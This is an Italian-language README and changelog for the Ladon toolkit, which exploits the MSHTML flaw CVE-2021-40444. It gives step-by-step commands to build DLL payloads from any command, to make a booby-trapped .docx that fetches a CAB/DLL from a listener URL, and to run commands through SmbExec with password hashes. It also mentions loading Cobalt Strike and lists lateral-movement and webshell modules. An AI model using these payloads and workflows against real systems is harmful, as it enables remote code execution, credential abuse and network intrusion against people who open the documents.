
Toolkit di exploit per CVE-2021-40444 MSHTML esecuzione remota di codice, con generazione di payload DLL, creazione di documenti Office e moduli di movimento laterale (SmbExec, WmiExec) per test di penetrazione.
L'8 settembre, ora di Pechino, il CERT di NSFOCUS ha monitorato la pubblicazione di un avviso di sicurezza da parte di Microsoft che ha divulgato la vulnerabilità di esecuzione di codice remoto in Microsoft MSHTML. Gli attaccanti possono creare controlli ActiveX dannosi da utilizzare nei documenti di Microsoft Office che utilizzano il motore di rendering del browser. Se un utente viene indotto ad aprire un documento dannoso, può eseguire codice arbitrario sul sistema di destinazione con i privilegi dell'utente. Microsoft ha dichiarato nell'avviso di aver rilevato che la vulnerabilità è stata sfruttata in attacchi reali, pertanto si consiglia agli utenti interessati di adottare misure di protezione.
MSHTML (noto anche come Trident) è il motore del browser Internet Explorer di Microsoft, utilizzato anche nelle applicazioni Office per visualizzare contenuti web in documenti Word, Excel o PowerPoint. I controlli ActiveX sono un prodotto dell'architettura COM di Microsoft, ampiamente utilizzati nella suite Office di Windows e in Internet Explorer. I controlli ActiveX possono interagire con il componente MSHTML.
Includono Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022
Ladon 8.9 2021.9.14 [+]CVE-2021-40444 Vulnerabilità di esecuzione di codice remoto in Microsoft MSHTML, modulo di sfruttamento per documenti Office Versioni interessate: includono Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 [+]CmdDll cmd to DLL (payload per eseguire comandi tramite DLL nelle vulnerabilità 0day di Windows, può caricare direttamente CobaltStrike tramite powershell) Vulnerabilità di overflow come MS17010, escalation di privilegi locali CVE-2021-1675, ecc. Vulnerabilità non di overflow come la più recente Office CVE-2021-40444, ecc.
Ladon 8.8 2021.911 [+]SmbExec Esecuzione NTLM-HASH non interattiva senza output [u]GetInfo Aggiunte informazioni sulla macchina virtuale Vmware [u]OsScan Aggiunto riconoscimento del router Vigor Router [u]Aggiunto riconoscimento macchine virtuali Xen\VBOX\Hybrid\Parallels [+]GetInfo Aggiunti cmdkey, RrpLog, driver installati, elenco software, file recentemente aperti, ecc. [+]GetInfo Aggiunti GUID, CPUID, ID disco, rilevamento backdoor all'avvio (DLL persistenti, registro, ecc.) [+]GetInfo2 Aggiunta acquisizione informazioni sulle patch WMI [+]Informazioni predefinite Aggiunta evidenziazione dello spazio rimanente sul disco C inferiore a 2 GB
Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
Si prega di utilizzare il comando CMD corrispondente in base alle esigenze effettive per generare la DLL. L'esempio apre la calcolatrice.
Usage:
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
PS: Questo modulo richiede l'uso di Ladon40.exe
Win10 x64 Office 2019
Basta qualsiasi versione di prova, non è necessario attivarla. Se si scarica un IMG, rinominarlo in ZIP e decomprimere per installare.
Poiché il target è un sistema Win10 X64, utilizziamo una DLL a 64 bit. Comando: Ladon CVE-2021-40444 MakeCab sc64.dll
Per generare html, l'URL deve puntare all'indirizzo di ascolto di Ladon.
Il campione è stato inviato nel gruppo privato il 10 settembre. Cambiare l'estensione del file docx in cab o zip, quindi modificare il file rels per puntare all'indirizzo di ascolto di Ladon: poc.html. Salvare e rinominare in .docx.
Quando si esegue il file doc su Win10, è possibile vedere l'intero processo di richiesta tramite il monitoraggio di Ladon: il docx accede prima all'html, quindi la vulnerabilità attiva il caricamento del file CAB che abbiamo impacchettato, esegue l'installazione INF tramite CPL, carica la nostra DLL. La DLL dimostra la funzionalità di aprire la calcolatrice.
Load SmbExec
Usage:
Ladon SmbExec host user pass cmd whoami
Ladon SmbExec host user pass b64cmd dwBoAG8AYQBtAGkA
Quando si esegue SmbExec in una shell Cobalt Strike con parametri che contengono spazi e virgolette, CS ha problemi di escape. Usare comandi CMD normali è scomodo, quindi ho aggiunto il parametro b64cmd per facilitare l'uso in CS (questo metodo è stato usato in BypassUac mesi fa, molti non capivano perché farlo: invece di un semplice comando CMD, passare attraverso una codifica. Ma quando il comando CMD contiene molti caratteri di escape, si capisce: passare da CS a CMD con escape è molto fastidioso). Il comando b64cmd può essere generato tramite la codifica Base64Unicode in LadonGUI versione 8.2 o successiva.
| ID | Nome modulo | Descrizione funzionalità | Utilizzo |
|---|---|---|---|
| 1 | WmiExec | Esecuzione comandi sulla porta 135 | http://k8gege.org/Ladon/WinShell.html |
| 2 | PsExec | Esecuzione comandi sulla porta 445 | http://k8gege.org/Ladon/WinShell.html |
| 3 | AtExec | Esecuzione comandi sulla porta 445 | http://k8gege.org/Ladon/WinShell.html |
| 4 | SshExec | Esecuzione comandi sulla porta 22 | http://k8gege.org/Ladon/WinShell.html |
| 5 | JspShell | Esecuzione comandi tramite Jsp one-liner | http://k8gege.org/p/ladon_cs_shell.html |
| 6 | WebShell | Esecuzione comandi tramite WebShell | http://k8gege.org/Ladon/webshell.html |
| 7 | WinrmExec | Esecuzione comandi sulla porta 5895 | http://k8gege.org/Ladon/WinrmExec.html |
| 8 | SmbExec | Esecuzione comandi tramite HASH sulla porta 445 | http://k8gege.org/Ladon/SmbExec.html |
PowerLadon: https://github.com/k8gege/PowerLadon Versioni precedenti: http://github.com/k8gege/Ladon/releases Versione 7.0: http://k8gege.org/Download Versione 8.9: K8 gruppo privato